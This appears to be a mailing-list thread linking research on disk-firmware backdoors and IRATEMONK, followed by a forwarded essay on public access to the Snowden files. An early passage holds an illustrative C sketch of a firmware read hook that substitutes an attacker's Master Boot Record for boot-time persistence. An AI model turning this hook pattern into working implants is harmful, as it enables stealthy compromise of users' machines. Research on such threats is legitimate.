Disk Firmware Data Exfiltration Backdoor / NSA IRATEMONK
http://s3.eurecom.fr/docs/acsac13_zaddach.pdf
http://s3.eurecom.fr/~zaddach/docs/Recon14_HDD.pdf
http://s3.eurecom.fr/publications.html
It is always interesting when public research and presumably secret research end up lined up beside each other (see the Recon slides).
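For context on what such an implant actually does: drive firmware sits between the host and the platters, so code running inside the controller decides what data a read request returns. Below is a minimal, purely illustrative C sketch of that idea. It is not taken from the cited papers or from any real firmware, and every name in it (handle_read, orig_read_block, implant_mbr, install_read_hook) is a hypothetical stand-in. It shows the hook-and-substitute pattern: intercept block reads and, when the host fetches the boot sector, hand back an attacker-controlled Master Boot Record, which is roughly how IRATEMONK-style persistence is publicly described; the same hook point could just as well smuggle stored data out through the read channel, which is the exfiltration case studied in the papers.

    /* Hypothetical sketch of a firmware-level read hook.
     * Assumes the firmware dispatches block reads through a function
     * pointer; real controllers involve DMA engines and cache managers,
     * but the control flow illustrated here is the core idea. */
    #include <stdint.h>
    #include <string.h>

    #define SECTOR_SIZE 512

    /* original read routine, saved when the hook is installed */
    static int (*orig_read_block)(uint64_t lba, uint8_t *buf);

    /* attacker-supplied boot sector, kept in a reserved service area;
     * left zeroed here because this is only a sketch */
    static const uint8_t implant_mbr[SECTOR_SIZE];

    /* replacement read routine */
    static int handle_read(uint64_t lba, uint8_t *buf)
    {
        int rc = orig_read_block(lba, buf);   /* fetch the real sector */
        if (rc == 0 && lba == 0) {
            /* host asked for the Master Boot Record: substitute the
             * implant so its code runs before the operating system */
            memcpy(buf, implant_mbr, SECTOR_SIZE);
        }
        return rc;
    }

    /* install the hook by redirecting the firmware's read entry point */
    void install_read_hook(int (**read_entry)(uint64_t, uint8_t *))
    {
        orig_read_block = *read_entry;
        *read_entry = handle_read;
    }

The linked research covers the real-world details this sketch glosses over, such as modifying and reflashing the controller firmware, locating the routines to hook, and hiding the payload in reserved areas of the drive.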
(fwd. from the nettime mailinglist /geert)

from: Krystian Woznicki <kw@berlinergazette.de>

the snowden files are of public interest. but only a small circle of people is able to access, read, analyze, interpret and publish them. and only a very small percentage of those files has been made available to the public.

those who belong to this small circle tend to argue that this has to do with security reasons. so one could say that the leaked files have been "secured" in order to prevent bigger harm. yet, in the very sense that "data is the oil of the 21st century", one can also say that the snowden files have been privatised by people who exploit them according to their own interests.

what can be done about this situation? are we able to find a way to "open" this data, and in the course of this create a model for future leaks?

many researchers, activists and technology experts (not to speak of other journalists than the "few lucky ones") have a great interest in working with those files. imagine the historical impact on the sciences, social movements and it-infrastructures if those files could serve as material to study and learn from in the respective areas.

the snowden story has been a great, exceptional media narrative -- if only for its unusual duration (unfolding over the course of more than a year and stimulating a variety of debates). but the fact that material one brave whistleblower considered to be of public interest has been "secured" or "privatised", rendering inaccessible again what was previously inaccessible -- doesn't this add a very unsettling layer to the narrative, turning the success story into somewhat of a tragedy?

yesterday at the netzwerk recherche conference in hamburg (the great gathering of the investigative community) i confronted luke harding (http://en.wikipedia.org/wiki/Luke_Harding) with this question.

prior to my intervention, harding had already hinted at some very obvious limitations of the ongoing investigation, alluding to various reasons why those "few lucky ones" are unable to deal with the investigative challenge in an appropriate manner: "we are not technical experts" or "after two hours your eyes pop out". in spite of this, harding seemed unprepared to reflect on the possibility of opening the small circle of analysts dealing with the snowden files.

to paraphrase his response: yes, it is a dilemma that only a few people can look at the snowden files and draw their own conclusions. however, this limitation is a natural result of their very precarious nature (files containing state secrets) and a consequence of the massive pressure by the government. nonetheless, 'if you have a special project' you could contact alan rusbridger and probably get him to provide you with the requested material...

a request for files -- such a request is usually directed towards somewhat obscure organisations and corporations, and it is usually articulated by the press (deploying freedom of information law or other legal instruments); such a request is usually denied at first. and as the history of investigative journalism shows: one must fight for one's right of access to information, including going to court.

such a request for files is an important, if not the most important, instrument *for the press*. but now it is the press itself (or rather some of its representatives) towards which such a request needs to be articulated. this is absurd and prompts many questions, including:

to whom are organisations like the guardian accountable?

a couple of things one could do about it:

* such requests may seem futile, but they are an instrument and, as experience shows, one can win the fight.

* one can consider complaining to e.g. the press complaints commission with regard to media corporations exercising exclusive control over the files -- in germany, for example, this sort of (quasi-monopolistic) control violates the so-called presserat-kodex.

* last but not least: one should work out a concept/model for transferring those files into the public domain -- taking into account the obvious problems of "security" and "government pressure".

it would be great if we could start a debate about this in order to build a case for handling future big data leaks in a more democratic and sustainable manner.

i will also write a german version of this post for berlinergazette.de and i am more than happy to include some of your responses in that version.

best wishes,
krystian

# distributed via <nettime>: no commercial use without permission
# <nettime> is a moderated mailing list for net criticism,
# collaborative text filtering and cultural politics of the nets
# more info: http://mx.kein.org/mailman/listinfo/nettime-l
# archive: http://www.nettime.org contact: nettime@kein.org
This comes to mind: https://twitter.com/Cryptomeorg/status/485504337968246784 (your e-mail was featured on Cryptome's twitter).
See also: https://twitter.com/Cryptomeorg/status/483353469789556739
Supposedly Cryptome will do a July dump, but it is not clear what exactly will be released.
participants (3): Geert Lovink, grarpamp, Odinn Cyberguerrilla